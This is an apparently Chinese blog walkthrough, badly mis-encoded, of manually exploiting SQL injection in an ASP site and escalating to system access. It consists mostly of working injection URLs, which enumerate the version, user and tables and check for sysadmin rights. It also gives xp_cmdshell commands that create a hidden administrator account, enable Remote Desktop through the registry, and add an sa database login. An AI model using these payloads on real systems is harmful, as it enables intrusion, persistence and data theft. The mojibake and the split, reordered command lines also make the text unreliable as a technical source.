ÊÕ²ØСվ
MSSQLÊÖ¹¤×¢Èë²¢ÌáȨ ÏÂÔر¾ÎÄ

ÄÚÈÝ·¢²¼¸üÐÂʱ¼ä : 2026/2/25 20:31:49ÐÇÆÚÒ» ÏÂÃæÊÇÎÄÕµÄÈ«²¿ÄÚÈÝÇëÈÏÕæÔĶÁ¡£

MSSQLÊÖ¹¤×¢Èë²¢ÌáȨ

×÷Õߣºº£Ä¬

Blog£ºhttp://hi.http://www.35331.cn//chjxhyy/

Ä¿±êÕ¾£ºhttp://www.xxoo.net

ÔÚÊ×Ò³Ëæ±ãµã¼¸¸öÁ´½Ó£¬¼Ó¡¯ ²âÊÔÊÇ·ñ´æÔÚ×¢Èë ÔÚ¸ÃÁ´½Óϱ¨´íÁË¡£¡£

[Microsoft][ODBC SQL Server Driver][SQL Server]×Ö·û´® '237' order by pu_id asc' ֮ǰÓÐδ±ÕºÏµÄÒýºÅ¡£

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237'£¨ÎªÁ˱ÜÃâÀûÓÃËÑË÷ÒýÇæËѵ½£¬ËùÒÔÒþ²ØµÄ±È½ÏÉ

ÊÇ×Ö·ûÐ͵ġ£×ֶκóÃ滹ÓÐorder by Óï¾ä£¬ÓÃ--×¢Ê͵ô¾Íok

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=1--ÕýÈ· http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=2--±¨´í

´æÔÚ×¢È룬ÏÂÃæÏ°¹ßÐԵľÍÊDZ¬±íºÍ±¬×ֶΡ£¡£ÏȲ鿴Ï»ù±¾ÐÅÏ¢£º

²é¿´MSSQL Êý¾Ý¿â°æ±¾

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 0<>(select @@version)¡ª

Ϊsql server2000µÄ¡£

²é¿´µ±Ç°Êý¾Ý¿â

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and db_name()>0¡ª

µ±Ç°¿âµÄÓû§

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and user>0¡ª

ÊÇ·ñÖ§³Ö¶àÓï¾ä²éѯ

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' ;declare @a int¡ª ¿ÉÒÔ¡£¡£

±¬±í֮ǰ»¹ÊÇÏÈÕÒÏÂĿ¼°É£¬ÃâµÃµÃµ½Õ˺ÅÃÜÂëÕÒ²»µ½ºǫ́£¬²»°×ϹÁË¡£¡£ urlºóÃæ¼Óadmin£¬½ûÖ¹ÁÐĿ¼£¬

ºóÃæ¼Ó¸ö¼¸¸ö³£¼ûµÄ¶¼²»¶Ô£¬login.asp ¡¢admin.asp µÈµÈ »¹ÊÇwwwscanɨÏ°ɣ¬

Ô­À´ÊÇadmin_main_asp£¬µã»÷·ÃÎÊϵǽ³¬Ê±£¬È»ºóתµ½ÁËsystemĿ¼£¬Ô­À´ÊÇÕâ¸ö http://www.xxoo.net/system

Ok£¬ÏÂÃ汬±í°É£¬µÚÒ»¸ö

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 name from sysobjects where xtype='u')>0¡ª

µÚ¶þ¸ö¡¢¡¢

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 name from sysobjects where xtype='u' and name not in ('sdlabout'))>0¡ª

ÒÔ´ËÀàÍÆ£¬±¬³öÈçÏÂ±í£º

'zxkd','yjcx_qs','yjcx_md','yjcx','t_shop','t_publish','t_project','t_logins','t_functions','t_employee_functions','t_employee','sqyj','shopwin','sdlnews','sdlhome','sdl_member_old','sdl_member','SailingSchedule','sailingdata','SailingAdjustmentInformation','RulesOperating','pu_cp','person','OperationalInformation','online_ly','oldSailingSchedule1','oldRulesOperating1','oldnewyunjia1','newyunjia','new_sailingdate','kouan','katj','IndustryNews','hxjx','FeeAdjustmentInformation','execlname','exceldata','dtxx','dtproperties','dcnews','dcmember','dc_sft','dc_sf','dc_jbxx','dc_hy','dc_hw','dc_gk','dc_gg_hw','dc_gg','sdlabout','AgentNetwork','aucclass','cusinfo' ÄáÂ꣬²»ÉÙ°¡£¬ÀÛËÀÁË¡£ÄǸöÊǹÜÀí±íÄØ£¬t_logins±È½ÏÏñ£¬¾ÍËüÁË

±¬×ֶΣ¡

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' col_name(object_id('t_logins'),1) from sysobjects)>0--

and (select top 1

È»ºóÒÀ´Î±¬³ö£ºlogin_name login_password

ÐÄÀﻹͦ¸ßÐË£¬½á¹û¾Í±¯¾çÁË£¬±¬ÄÚÈݵÄʱºò¾ÓȻʲô¶¼Ã»ÓУ¬¿Õ±í£¿£¡

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and (select top 1 login_name from [t_logins])>0--

¿´Ç°ÃæµÄ±í£¬¾Ít_logins»¹Õ´±ß£¬ÆäËûµÄÒ²ÀÁµÃÊÔÁË¡£¡£ÏëÆäËû°ì·¨¿©¡£

ÎÒÊ×ÏÈÏëµ½Á˱¸·ÝÄÃshell£¬ÒòΪǰÃæÏÔʾµÄÓû§Îªdbo£¬µ«ÊÇÎÊÌâÊDz»ÖªµÀ·¾¶°¡¡£

·­×Å×Ô¼ºÊÕ¼¯µÄsqlÓï¾ä£¬¿´µ½Ò»¾äand 1=(select is_srvrolemember('sysadmin'))¡ª ÅжÏÊý¾Ý¿âÓû§ÃûÊÇ·ñÓµÓбȽϸߵÄȨÏÞ¡£

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' is_srvrolemember('sysadmin'))¡ª

and

1=(select

SaȨÏÞ£¡£¡

½Ó×ÅÓÖÀ´ÁËÒ»¾ä£ºand 1=(select IS_SRVROLEMEMBER('sysadmin'))-- »¹ÕæÊÇsaȨÏÞ¡£ÎÒÔÎÇ°ÃæÎÒÔõôûʽһÏÂÄØ¡£

Sa¾Í±È½ÏºÃ°ìÁË¡£¡£

Ê×ÏÈ¿´¿´xp_cmdshell´æ´¢¹ý³Ì

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' and 1=(select master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')¡ª

count(*)

from

¹þ¹þ£¬´æÔÚ¡£ Ö±½Ó¼ÓÓû§À²¡£

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec hmhk$ haimohk /add'¡ª

´Ëʱ£¬ÓÖ³öÏÖ´íÎó£º

ÎÞ·¨×°ÔØ DLL x »ò¸Ã DLL ËùÒýÓõÄijһ DLL¡£Ô­Òò: 126(ÕÒ²»µ½Ö¸¶¨µÄÄ£¿é¡£) °Ù¶ÈÁËһϣ¬ËµÊÇÓÉÓÚSQL2000µÄSAÃÜÂë¹ýÓÚ¼òµ¥µ¼Ö¡£

http://hi.http://www.35331.cn//mlm_mlm/blog/item/30eb9422672d84e6d7cae296.html

°´×Å·½·¨£¬ÎÊÌâ½â¾öÁË£¬¼ÌÐø¼Ó

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell 'net user hmhk$ haimohk /add'¡ª

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec master..xp_cmdshell ¡®net localgroup

master..xp_cmdshell

'net

user

administrators hmhk$ /add¡¯ µ«³öÏÖ´íÎóÁË£¬²»ÖªµÀ¼ÓÉÏû¡£

MstscµÇ½ÏÂÊÔÊÔ¡£

Õâ¿ÉÈçºÎÊǺᣡ£

Ī·Çû¿ª£¬»¹ÊǶ˿ڸÄÁË¡£

Ö´ÐÐÏÂÃüÁÆô3389,

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237';exec HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\REG_DWORD /d 0 /f¡¯

master..xp_cmdshell

/v

¡®REG

ADD /t

\fDenyTSConnections

ÔÙÁ¬»¹ÊÇÄÇÑù¡£È¥¶Á¶Ë¿ÚҲû»ØÏÔ°¡£¬ÓÖɵÁË¡£

ÏëÁËÒ»»á£¬Í»È»Ïëµ½¿ÉÒÔ¼ÓÒ»¸ösaȨÏÞµÄÊý¾Ý¿âÓû§°¡£¬È»ºósqlToolsÁ¬½Ó£¬ÓÖ¿ÉÒÔ×öºÜ¶àÊÂÇéÁË£¬¸Â¸Â¡¢

http://www.xxoo.net/directory/xxoo.ASP?xx_ID=237' adm1n,haimohk

exec

master.dbo.sp_addlogin

WordÎĵµÏÂÔØ£ºMSSQLÊÖ¹¤×¢Èë²¢ÌáȨ.doc
ËÑË÷¸ü¶à:MSSQLÊÖ¹¤×¢Èë²¢ÌáȨ


×îÐÂä¯ÀÀ


ÈÈÃÅä¯ÀÀ
All rights reserved Powered by ÄϾ©Áλª´ð°¸Íø¡¡
×ÊÁÏÀ´×Ô»¥ÁªÍø£¬ ÓÐÈκÎÒÉÎÊ£¬ÇëÁªÏµ¿Í·þ£º779662525☒qq.com ËÕICP±¸20003344ºÅ-4